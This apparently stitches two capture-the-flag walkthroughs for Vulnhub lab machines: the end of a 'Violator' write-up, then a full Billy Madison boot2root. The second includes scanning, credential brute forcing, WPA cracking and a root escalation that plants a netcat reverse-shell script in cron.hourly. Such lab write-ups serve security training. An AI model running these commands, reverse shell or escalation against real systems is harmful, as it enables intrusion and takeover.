Y Resolution                    : 300
Exif Byte Order                 : Big-endian (Motorola, MM)
Image Description               : Violator
Software                        : Google
Artist                          : Dave Gaham
Copyright                       : UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI
Exif Version                    : 0220
Date/Time Original              : 1990:03:19 22:13:30
Create Date                     : 1990:03:19 22:13:30
Sub Sec Time Original           : 04
Sub Sec Time Digitized          : 04
Exif Image Width                : 1450
Exif Image Height               : 1450
XP Title                        : Violator
XP Author                       : Dave Gaham
XP Keywords                     : created by user dg
XP Subject                      : policyoftruth
Padding                         : (Binary data 1590 bytes, use -b option to extract)
About                           : uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b
Rights                          : UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI
Creator                         : Dave Gaham
Subject                         : created by user dg
Title                           : Violator
Description                     : Violator
Warning                         : [minor] Fixed incorrect URI for xmlns:MicrosoftPhoto
Date Acquired                   : 1941:05:09 10:30:18.134
Last Keyword XMP                : created by user dg
Image Width                     : 1450
Image Height                    : 1450
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1450x1450
Megapixels                      : 2.1
Create Date                     : 1990:03:19 22:13:30.04
Date/Time Original              : 1990:03:19 22:13:30.04

I was unable to get the Minarke program to work but the following decoder decoded the text for me. I just had to fix up the spacing to fully read the message.

ONE FINAL CHALLENGE FOR YOU BGHX 

CONGRATULATIONS FOR THE FOURTH TIME ON SNARFING THE FLAG ON VIOLATOR 
ILL PRESUME BY NOW YOULL KNOW WHAT I WAS LISTENING TO WHEN CREATING THIS CTF I HAVE INCLUDED THINGS WHICH WERE DELIBERATLY AVOIDING  THE OBVIOUS ROUTE IN TO KEEP YOU ON YOUR TOES 
ANOTHER THOUGHT TO PONDER IS THAT BY ABUSING PERMISSIONS YOU ARE ALSO BY DEFINITION A VIOLATOR 

SHOUT OUTS AGAIN TO VULNHUB FOR HOSTING A GREAT LEARNING TOOL A SPECIAL THANKS GOES TO BENR AND GKNSB FOR TESTING AND TO GTMLK FOR THE OFFER TO HOST THE CTF AGAIN 

KNIGHTMARE

An update on knightmare’s Twitter here tells us that the final message should read BGH 393X. A little research leads us to this message board which tells us that this is the license plate for a 1981 Ford Corina MkV in the music video for the Depeche Mode song ‘Useless’.

i288483

Overall this one a fun VM with plenty of twists and turns. I learned some new techniques and about the band Depeche Mode. Thank you knightmare for the challenge and sharing a bit of culture with us.

As always, thank you to g0tmi1k and the vulnhub team for maintaining this great resource/community.

Until next time, enjoy the music!

Billy Madison vulnhub VM walkthrough

I was browsing Twitter one afternoon and saw that @7minsec was looking for testers for his next boot2root challenge, based on the movie Billy Madison. Since I thoroughly enjoyed his first CTF (Tommy Boy) I jumped at the opportunity.

Recon

As always, we start off with a super stealthy nmap scan.

Nmap scan report for 192.168.110.181
Host is up (0.00020s latency).
Not shown: 65526 filtered ports

PORT     STATE  SERVICE     VERSION
22/tcp   open   tcpwrapped
23/tcp   open   telnet?
69/tcp   open   http        BaseHTTPServer
80/tcp   open   http        Apache httpd 2.4.18 
139/tcp  open   netbios-ssn Samba smbd 3.X 
445/tcp  open   netbios-ssn Samba smbd 3.X 
2525/tcp open   smtp

Grabbing the source of the index page on port 80 we can see that Billy’s PC has been take over and we must unlock it and recover his final paper before time is up! I also took a look at the eric.php page, which came to find out later is a troll to block directory bruteforcing with tools such as dirbuster.

root@mrb3n:~# curl -s http://192.168.110.181
<TITLE>Oh nooooooo!</TITLE>
<html>
<p>
<center><h1> UH OH!</h1></center>
<p>
<center><img src="eric-tongue-animated.gif"></center>
<p>
<center><h1>Silly Billy!!!</h1></center>
<p>
<center><h3>If you're reading this, you clicked on the link I sent you.  OH NOES!  Your computer's all locked up, and now you can't get access to your final 12th grade assignment you've been working so hard on!  You need that to graduate, Billy Boy!!</h3></center>
<p>
<center><h3>Now all I have to do is sit and wait for a while and...</h3></center>
<p>
<center><img src="hotels.gif"></center>
<p> 
<center><h2>I bet this is you right now:</h2></center>
<p>
<center><img src="billy-mad.png"><img src="billy-mad.png"><img src="billy-mad.png"></center>
<P>
<p><center><h2>Think you can get your computer unlocked and recover your final paper before time runs out and you FAAAAIIIILLLLL?????</h2></center>
<p>
<center>Good luck, schmuck.</center>
<p>
</html>

I pulled down all of the images for offline analysis as they often contain valuable information during CTFs but I did not uncover anything useful.

root@mrb3n:~/Desktop/billymadison# curl -O http://192.168.110.181/billy-mad.png
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  225k  100  225k    0     0  18.5M      0 --:--:-- --:--:-- --:--:-- 19.9M

root@mrb3n:~/Desktop/billymadison# curl -O http://192.168.110.181/hotels.gif
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  329k  100  329k    0     0  53.6M      0 --:--:-- --:--:-- --:--:-- 64.4M

root@mrb3n:~/Desktop/billymadison# curl -O http://192.168.110.181/eric-tongue-animated.gif
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  440k  100  440k    0     0  26.1M      0 --:--:-- --:--:-- --:--:-- 26.8M



Having exhausted my options on the web app for the time being I checked out what was going on with the telnet port. I was greeted with a friendly ban notice (confirmed on a re-connection attempt) as well as my first hint at a password (possibly ROT).

root@mrb3n:~/Desktop/billymadison# telnet 192.168.110.181
Trying 192.168.110.181...
Connected to 192.168.110.181.
Escape character is '^]'.
****** HAHAH! You're banned for a while, Billy Boy!  By the way, I caught you trying to hack my wifi - but the joke's on you! I don't use ROTten passwords like rkfpuzrahngvat anymore! Madison Hotels is as good as MINE!!!! *****
Connection closed by foreign host.

Port 69 was hosting a WordPress site. I enumerated a bit with WPScan and ultimately hit a wall. Once on the box I confirmed that this was an intentional honeypot by the author.

root@mrb3n:~# wpscan --url http://192.168.110.181:69 --enumerate u
WordPress Security Scanner by the WPScan Team 
                       Version 2.8
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o [A]bort, default: [N]n
The plugins directory 'wp-content/plugins' does not exist.
You can specify one per command line option (don't forget to include the wp-content directory if needed)
[?] Continue? [Y]es [N]o, default: [N]
y
[+] URL: http://192.168.110.181:69/
[+] Started: Thu Aug 25 11:33:21 2016

[!] The WordPress 'http://192.168.110.181:69/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: MadisonHotelsWordpress
[+] XML-RPC Interface available under: http://192.168.110.181:69/xmlrpc.php

[+] WordPress version 1.0 identified from meta generator

[+] WordPress theme in use: twentyeleven

[+] Name: twentyeleven
 |  Location: http://192.168.110.181:69/wp-content/themes/twentyeleven/
 |  Readme: http://192.168.110.181:69/wp-content/themes/twentyeleven/readme.txt
 |  Changelog: http://192.168.110.181:69/wp-content/themes/twentyeleven/changelog.txt
 |  Style URL: http://192.168.110.181:69/wp-content/themes/twentyeleven/style.css
 |  Referenced style.css: http://192.168.110.181:69/static/wp-content/themes/twentyeleven/style.css
 |  Description: 

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Enumerating usernames ...
[!] Stop User Enumeration plugin detected, results might be empty. However a bypass exists for v1.2.8 and below, see stop_user_enumeration_bypass.rb in /usr/share/wpscan
[+] We did not enumerate any usernames

[+] Finished: Thu Aug 25 11:33:22 2016
[+] Requests Done: 62
[+] Memory used: 7.863 MB
[+] Elapsed time: 00:00:00

Next I fired up enum4linux to see what I could uncover on our SMB port. The scan returned an open share (with anonymous access) as well as 3 local users.

root@mrb3n:~/Desktop/billymadison# enum4linux -a 192.168.110.181
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Aug 25 11:23:27 2016

 ============================================ 
|    Share Enumeration on 192.168.110.181    |
 ============================================ 
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

	Sharename       Type      Comment
	---------       ----      -------
	EricsSecretStuff Disk      
	IPC$            IPC       IPC Service (BM)

	Server               Comment
	---------            -------
	BM                   BM

	Workgroup            Master
	---------            -------
	WORKGROUP            BM

[+] Attempting to map shares on 192.168.110.181
//192.168.110.181/EricsSecretStuff	Mapping: OK, Listing: OK
//192.168.110.181/IPC$	Mapping: OK	Listing: DENIED


========================================================================== 
|    Users on 192.168.110.181 via RID cycling (RIDS: 500-550,1000-1050)    |
 ========================================================================== 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-4111762292-2429122530-3796655328
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ' '

S-1-22-1-1000 Unix User\billy (Local User)
S-1-22-1-1001 Unix User\veronica (Local User)
S-1-22-1-1002 Unix User\eric (Local User)

Connecting to the Samba share I pulled down the files listed. The ebd.txt file stated that the backdoor was closed, more on that later.

root@mrb3n:~# smbclient //192.168.110.181/EricsSecretStuff -u anonymous
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: \> ls
  .                                   D        0  Thu Aug 25 10:16:19 2016
  ..                                  D        0  Sat Aug 20 14:56:45 2016
  ._.DS_Store                        AH     4096  Wed Aug 17 10:32:07 2016
  ebd.txt                             N       35  Thu Aug 25 10:16:19 2016
  .DS_Store                          AH     6148  Wed Aug 17 10:32:12 2016

59164 blocks of size 524288. 50914 blocks available

smb: \> get ebd.txt 
getting file \ebd.txt of size 35 as ebd.txt (5.7 KiloBytes/sec) (average 5.7 KiloBytes/sec)
smb: \> get ._.DS_Store 
getting file \._.DS_Store of size 4096 as ._.DS_Store (1000.0 KiloBytes/sec) (average 403.4 KiloBytes/sec)
smb: \> get .DS_Store 
getting file \.DS_Store of size 6148 as .DS_Store (1200.8 KiloBytes/sec) (average 669.2 KiloBytes/sec)

root@mrb3n:~/Desktop/billymadison# cat ebd.txt 

Erics backdoor is currently CLOSED

The string ‘Rkfpuzrahngvat’ obtained from the telnet connection earlier was interesting and appeared to be some sort of encrypted or ciphered text. In the end it proved to be ROT13, decrypting to ‘exschmenuating’. I tried this in various combinations of username and password without success. Eventually I took a long shot and attempted it as a page name and got a hit! Eric’s admin console!

root@mrb3n:~/Desktop/billymadison# curl -s http://192.168.110.181/exschmenuating/

<TITLE>Eric's Admin Console 1.0</TITLE>
<html>
<h1>"Ruin Billy Madison's Life" - Eric's notes</h1>
<p>
<center><h1>08/01/16</h1></center>
Looks like Principal Max is too much of a goodie two-shoes to help me ruin Billy Boy's life.  Will ponder other victims.

<center><h1>08/02/16</h1></center>
Ah!  Genius thought!  Billy's girlfriend Veronica uses his machine too.  I might have to cook up a phish and see if I can't get her to take the bait.

<center><h2>08/03/16</h2></center>
OMg LOL LOL LOL!!!  What a twit - I can't believe she fell for it!!  I .captured the whole thing in this folder for later lulz.  I put "veronica" somewhere in the file name because I bet you a million dollars she uses her name as part of her passwords - if that's true, she rocks!

Anyway, malware installation successful.  I'm now in complete control of Bill's machine!

<center>
<center><h1>Log monitor</h1></center>
<p>
<center>This will help me keep an eye on Billy's attempt to free his machine from my wrath.</center>
<p>
<center><a href="currently-banned-hosts.txt">View log</a>
<p>
</html>

Checking out the ‘currently-banned-hosts.txt’ file confirms that I have been banned multiple times while trying to connect via telnet. The file also offers a hint to reset the VM to remove the ban.

root@mrb3n:~/Desktop/billymadison# curl -s http://192.168.110.181/exschmenuating/currently-banned-hosts.txt
---
2016-08-25-13-59-01
Hosts currently banned
---
If your IP appears in this list it has been banned, and you will need to reset this host to lift the ban. Otherwise, further efforts to connect to this host may produce false positives or refuse connections altogether.
---
Chain INPUT (policy DROP)
DROP       all  --  192.168.110.179      anywhere            
---
If your IP appears in this list it has been banned, and you will need to reset this host to lift the ban. Otherwise, further efforts to connect to this host may produce false positives or refuse connections altogether.

I reset the VM and checked the ban list again.

root@mrb3n:~/Desktop/billymadison# curl -s http://192.168.110.181/exschmenuating/currently-banned-hosts.txt
---
2016-08-25-14-08-01
Hosts currently banned
Chain INPUT (policy DROP)
---
If your IP appears in this list it has been banned, and you will need to reset this host to lift the ban. Otherwise, further efforts to connect to this host may produce false positives or refuse connections altogether.
---

From the clue on the page above it seems like I may be looking for a packet capture file with ‘veronica’ in the file name. I tried many combinations, ultimately finding the file with a combination of a custom wordlist based on rockyou.txt and wfuzz.

root@mrb3n:~/Desktop/billymadison# cat /root/rockyou.txt | grep veronica > veronica.txt
root@mrb3n:~/Desktop/billymadison# wfuzz  -c -z file,/root/Desktop/billymadison/veronica.txt --hc 404 http://192.168.110.181/exschmenuating/FUZZ.cap 
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************

Target: http://192.168.110.181/exschmenuating/FUZZ.cap
Total requests: 773

==================================================================
ID	Response   Lines      Word         Chars          Request    
==================================================================

00521:  C=400     10 L	      35 W	    307 Ch	  "veronica$%"
00716:  C=200    192 L	     722 W	   8700 Ch	  "012987veronica"
00723:  C=200     24 L	     135 W	    940 Ch	  "#0104veronica"

Total time: 0.705309
Processed Requests: 773
Filtered Requests: 770
Requests/sec.: 1095.972

We are able to analyze packet capture files using the tshark command line utility. A quick bash script will pull out all separate TCP steams into .txt files.

for stream in `tshark -r 012987veronica.cap -T fields -e tcp.stream | sort -n | uniq`
do
    echo $stream
    tshark -r 012987veronica.cap -w stream-$stream.cap -Y "tcp.stream==$stream"
done

The packet capture contained 6 separate email messages.

Message 1

Date: Sat, 20 Aug 2016 21:56:50 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: VIRUS ALERT!
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/

Hey Veronica, 

Eric Gordon here.  

I know you use Billy's machine more than he does, so I wanted to let you know that the company is rolling out a new antivirus program for all work-from-home users.  Just <a href="http://areallyreallybad.malware.edu.org.ru/f3fs0azjf.php">click here</a> to install it, k?  

Thanks. -Eric

Message 2

Date: Sat, 20 Aug 2016 21:57:00 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:00 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE: VIRUS ALERT!

Eric,

Thanks for your message. I tried to download that file but my antivirus blocked it.

Could you just upload it directly to us via FTP?  We keep FTP turned off unless someone connects with the "Spanish Armada" combo.



-VV

Message 3

Date: Sat, 20 Aug 2016 21:57:11 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: test Sat, 20 Aug 2016 21:57:11 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[2]: VIRUS ALERT!

Veronica,

Thanks that will be perfect.  Please set me up an account with username of "eric" and password "ericdoesntdrinkhisownpee."

-Eric

Message 4

Date: Sat, 20 Aug 2016 21:57:31 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: test Sat, 20 Aug 2016 21:57:31 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[4]: VIRUS ALERT!

Veronica,

Great, the file is uploaded to the FTP server, please go to a terminal and run the file with your account - the install will be automatic and you won't get any pop-ups or anything like that.  Thanks!

-Eric

Message 5

Date: Sat, 20 Aug 2016 21:57:21 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:21 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[3]: VIRUS ALERT!

Eric,

Done.

-V

Message 6

Date: Sat, 20 Aug 2016 21:57:41 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:41 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[5]: VIRUS ALERT!

Eric,

I clicked the link and now this computer is acting really weird.  The antivirus program is popping up alerts, my mouse started to move on its own, my background changed color and other weird stuff.  I'm going to send this email to you and then shut the computer down.  I have some important files I'm worried about, and Billy's working on his big 12th grade final.  I don't want anything to happen to that!

-V

There is a lot of information here but the most important being in messages 2 and 3. The “Spanish Armada” combo is message 2 alludes to port knocking. In the YouTube clip provided Billy guesses the year of Spanish Armada is the following sequence: 1466, 1467, 1469, 1514, 1981, 1986. However, listening carefully he actually says “67” not 1467. We can use nmap for some port knocking with the combo provided.

for x in 1466 67 1469 1514 1981 1986; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x 192.168.110.181; done

Once completed I checked and sure enough port 21 was now open. Logging in with the credentials provided in message 3 provided our next clue.

The FTP directory contained a notes file as well as various exploits from exploit.db for Ubuntu 16.04 which were likely trolls, but I saved them for later just in case.

root@mrb3n:~/Desktop/billymadison# ftp 192.168.72.155
Connected to 192.168.72.155.
220 Welcome to ColoradoFTP - the open source FTP server (www.coldcore.com)
Name (192.168.72.155:root): eric
331 User name okay, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
ftp> ls
200 PORT command successful.
150 Opening A mode data connection for /.
-rwxrwxrwx 1 ftp 6326 Aug 20 12:49 40049
-rwxrwxrwx 1 ftp 9132 Aug 20 12:49 40054
-rwxrwxrwx 1 ftp 1287 Aug 20 12:49 9129
-rwxrwxrwx 1 ftp 740 Aug 22 21:18 .notes
-rwxrwxrwx 1 ftp 5367 Aug 20 12:49 39772
-rwxrwxrwx 1 ftp 5208 Aug 20 12:49 39773

The .notes file refers to the privilege escalation explanations, one of them being backwards (more on that later) as well as a hint at how to open Eric’s backdoor and a mention of Billy and Veronica’s account passwords.

root@mrb3n:~/Desktop/billymadison# cat .notes 
Ugh, this is frustrating.  

I managed to make a system account for myself. I also managed to hide Billy's paper
where he'll never find it.  However, now I can't find it either :-(. 
To make matters worse, my privesc exploits aren't working.  
One sort of worked, but I think I have it installed all backwards.

If I'm going to maintain total control of Billy's miserable life (or what's left of it) 
I need to root the box and find that paper!

Fortunately, my SSH backdoor into the system IS working.  
All I need to do is send an email that includes
the text: "My kid will be a ________ _________"

Hint: https://www.youtube.com/watch?v=6u7RsW5SAgs

The new secret port will be open and then I can login from there with my wifi password, which I'm
sure Billy or Veronica know.  I didn't see it in Billy's FTP folders, but didn't have time to
check Veronica's.

-EG

From some earlier testing I knew that I could send emails over port 2525 via telnet and the email file would be accessible in the EricsSecretStuff Samba directory. I crafted an email with the phrase “My kid will be a soccer player” in the body, waited a bit and checked. Sure enough the ebd file now stated that the backdoor was open.

root@mrb3n:~/Desktop/billymadison# telnet 192.168.72.155 2525
Trying 192.168.72.155...
Connected to 192.168.72.155.
Escape character is '^]'.
220 BM ESMTP SubEthaSMTP null
MAIL FROM: vvaugh@polyfector.edu
250 Ok
RCPT TO: eric@madisonhotels.com
250 Ok
DATA
354 End data with <CR><LF>.<CR><LF>

SUBJECT: email

My kid will be a soccer player

.
250 Ok

Email received

root@mrb3n:~# smbclient //192.168.72.155/EricsSecretStuff
Enter root's password: 
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: \> ls
  .                                   D        0  Fri Aug 26 10:57:38 2016
  ..                                  D        0  Sat Aug 20 14:56:45 2016
  260816095738178.eml                 N       95  Fri Aug 26 10:57:38 2016
  ._.DS_Store                        AH     4096  Wed Aug 17 10:32:07 2016
  ebd.txt                             N       53  Fri Aug 26 11:00:01 2016
  .DS_Store                          AH     6148  Wed Aug 17 10:32:12 2016

		59164 blocks of size 524288. 50881 blocks available
smb: \> get 260816095738178.eml 
getting file \260816095738178.eml of size 95 as 260816095738178.eml (30.9 KiloBytes/sec) (average 30.9 KiloBytes/sec)
smb: \> ^Z
[1]+  Stopped                 smbclient //192.168.72.155/EricsSecretStuff
root@mrb3n:~# cat 260816095738178.eml 
        Fri, 26 Aug 2016 09:57:14 -0500 (CDT)

SUBJECT: email

My kid will be a soccer player

Backdoor now open.

root@mrb3n:~# cat ebd.txt 
2016-08-26-10-03-01
Erics backdoor is currently OPEN

Another nmap scan shows us a newly opened port 1974.

PORT     STATE  SERVICE
22/tcp   open   ssh
23/tcp   open   telnet
69/tcp   open   tftp
80/tcp   open   http
137/tcp  closed netbios-ns
138/tcp  closed netbios-dgm
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
1974/tcp open   drp
2525/tcp open   ms-v-worlds

Scanning port 1974 revealed that the backdoor was an SSH client.

root@mrb3n:~# nmap -sV -p 1974 192.168.72.155

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-08-26 11:43 EDT
Nmap scan report for 192.168.72.155
Host is up (0.00062s latency).
PORT     STATE SERVICE VERSION
1974/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
MAC Address: 00:0C:29:44:13:0E (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We now have an SSH client, a username (eric) but no password. Reading back through the hints we see that there must be a user account for billy or veronica on one of the previously opened services. Since we have a previously generated wordlist for Veronica I gave it a go with ncrack against the FTP service.

root@mrb3n:~/Desktop/billymadison# ncrack -u veronica -P veronica.txt -T 5 192.168.72.155 -p 21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2016-08-26 11:59 EDT

Discovered credentials for ftp on 192.168.72.155 21/tcp:
192.168.72.155 21/tcp ftp: 'veronica' 'babygirl_veronica07@yahoo.com'

Ncrack done: 1 service scanned in 188.98 seconds.

Logging into the FTP as Veronica we have another email and another packet capture file. **Note you have to make sure to switch to binary mode once logged into the FTP or the packet capture file will not download properly.

root@mrb3n:~/Desktop/billymadison# ftp 192.168.72.155
Connected to 192.168.72.155.
220 Welcome to ColoradoFTP - the open source FTP server (www.coldcore.com)
Name (192.168.72.155:root): veronica
331 User name okay, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
ftp> ls
200 PORT command successful.
150 Opening A mode data connection for /.
-rwxrwxrwx 1 ftp 595 Aug 20 12:55 email-from-billy.eml
-rwxrwxrwx 1 ftp 719128 Aug 17 12:16 eg-01.cap

The email talks about cracking Eric’s wireless password and sure enough the packet capture file is encrypted 802.11 wireless traffic.

root@mrb3n:~/Desktop/billymadison# cat email-from-billy.eml 
        Sat, 20 Aug 2016 12:55:45 -0500 (CDT)
Date: Sat, 20 Aug 2016 12:55:40 -0500
To: vvaughn@polyfector.edu
From: billy@madisonhotels.com
Subject: test Sat, 20 Aug 2016 12:55:40 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
Eric's wifi

Hey VV,

It's your boy Billy here.  Sorry to leave in the middle of the night but I wanted to crack Eric's wireless and then mess with him.
I wasn't completely successful yet, but at least I got a start.

I didn't walk away without doing my signature move, though.  I left a flaming bag of dog poo on his doorstep. 🙂

Kisses,

Billy

Armed with our packet capture file and the trusty rockyou.txt wordlist I set to work attempting to crack Eric’s wireless password using aircrack-ng. Some 30 minutes later and I had a hit.

root@mrb3n:~/Desktop/billymadison# aircrack-ng eg-01.cap -w /root/rockyou.txt 
Opening eg-01.cap
Read 13003 packets.

   #  BSSID              ESSID                     Encryption

   1  02:13:37:A5:52:2E  EricGordon                WPA (1 handshake)

Choosing first network as target.

Opening eg-01.cap
Reading packets, please wait...

                                 Aircrack-ng 1.2 rc3


                   [00:32:35] 1699628 keys tested (897.71 k/s))


                           KEY FOUND! [ triscuit* ]


      Master Key     : 9E 8B 4F E6 CC 5E E2 4C 46 84 D2 AF 59 4B 21 6D 
                       B5 3B 52 84 04 9D D8 D8 83 67 AF 43 DC 60 CE 92 

      Transient Key  : 7A FA 82 59 5A 9A 23 6E 8C FB 1D 4B 4D 47 BE 13 
                       D7 AC AC 4C 81 0F B5 A2 EE 2D 9F CC 8F 05 D2 82 
                       BF F4 4E AE 4E C9 ED EA 31 37 1E E7 29 10 13 92 
                       BB 87 8A AE 70 95 F8 62 20 B5 2B 53 8D 0C 5C DC 

      EAPOL HMAC     : 86 63 53 4B 77 52 82 0C 73 4A FA CA 19 79 05 33

Finally, after all this time I had a shell. Logging in with eric’s credentials I was on to the next step.

root@mrb3n:~/Desktop/billymadison# ssh eric@192.168.72.155 -p 1974
eric@192.168.72.155's password: 
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-34-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

12 packages can be updated.
0 updates are security updates.


Last login: Sat Aug 20 22:28:28 2016 from 192.168.3.101
eric@BM:~$ 


eric@BM:~$ cat why-1974.txt 
Why 1974?  Because: http://www.metacafe.com/watch/an-VB9KuJtnh4bn/billy_madison_1995_billy_hangs_out_with_friends/

Beware of trolls!

The author took care to plant many trolls throughout the file system as well as some programs and files to give the appearance of an actual workstation.

eric@BM:/opt/coloradoftp-prime/home/anonymous$ cat Billys-12th-grade-final-project.doc 
HHAHAAHAHAH I CAN'T BELIEVE YOU ACTUALLY THOUGHT THIS WAS IT!!!!  WHAT A LOSER! Why don't you go pass
out by the pool for another hour!

-EG

I guess billy works as a pentester?

eric@BM:/opt# ls
bpatty             fakesmtp    reconng  Sn1per   wp
coloradoftp-prime  honeyports  rg       testssl

Privilege escalation

I spent a great deal of time enumerating the file system. I could see that billy had sudo privileges and a directory named ‘/PRIVATE’, owned by root. At this point I knew that I had to become root to move forward. None of the privilege escalation exploits alluded to in the FTP directory worked nor was I was to guess billy’s password.

I performed all the normal checks for world-writeable files, SUID and GUID binaries and one stood out.

root@BM:/opt/bpatty# find / -perm -2000 -type f 2>/dev/null
/usr/local/share/sgml/donpcgd
/usr/bin/chage
/usr/bin/wall
/usr/bin/screen
/usr/bin/mlocate
/usr/bin/crontab
/usr/bin/expiry
/usr/bin/bsd-write
/usr/bin/at
/usr/bin/ssh-agent
/usr/lib/x86_64-linux-gnu/utempter/utempter
/sbin/pam_extrausers_chkpwd
/sbin/unix_chkpwd

The binary in /usr/local/share/sgml appeared out of place. I pulled it down, opened it in IDA and confirmed that it was not a custom binary made for this challenge. Backing up to the hint about some of the exploits being backwards. If we reverse the name of this binary to “dgcpond” we have a likely candidate for local privilege escalation in DeleGate v9.9.13 (https://www.exploit-db.com/exploits/39134) which sets some binaries as SUID root (in this case GUID).  Per the explanation the “dgcpond” binary creates a node allowing for a local, unprivileged user, to create files anywhere on the disk. Meaning we can create a file in ANY directory (even those owned by root). Creating a shell script in the /etc/cron.hourly directory should help us to escalate privileges as any executable shell scripts in that directory will be run as root at 17 minutes past every hour.

Modifying the exploit syntax a bit a created an hourly cron to send me a reverse shell using mknod.

eric@BM:/usr/local/share/sgml$ touch /tmp/rootme; chmod +x /tmp/rootme; ./donpcgd /tmp/rootme /etc/cron.hourly/rootme; echo -e '#!/bin/bash \n mknod /tmp/backpipe p; nc 192.168.72.154 8443 0</tmp/backpipe | /bin/bash 1>/tmp/backpipe' > /etc/cron.hourly/rootme
#### mknod(/etc/cron.hourly/root,81fd,0)

I confirmed that the hourly cron job had been created, set up my listener and waited.

eric@BM:/etc/cron.hourly$ cat rootme
#!/bin/bash 
 mknod /tmp/backpipe p; nc 192.168.72.154 8443 0</tmp/backpipe | /bin/bash 1>/tmp/backpipe

I checked back after 17 past the next hour and I had a hit on my listener. A root shell!

root@mrb3n:~# nc -lvnp 8443
listening on [any] 8443 ...
connect to [192.168.72.154] from (UNKNOWN) [192.168.72.155] 58066
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux BM 4.4.0-34-generic #53-Ubuntu SMP Wed Jul 27 16:06:39 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
python -c 'import pty;pty.spawn("/bin/bash")'

root@BM:/#

Establishing persistence

Even after obtaining a better working tty the shell was a big sluggish. I decided to be a bit dirty and change billy’s password since I knew that he had sudo privileges. After changing his password I logged back in via SSH and things were much more stable.

root@BM:/# passwd billy
pswd billy
Enter new UNIX password: billy
Retype new UNIX password: billy

Checking out the root directory I found all of the shell scripts the author had carefully set up to troll us/keep us on track. Nicely done!

root@BM:~# ls
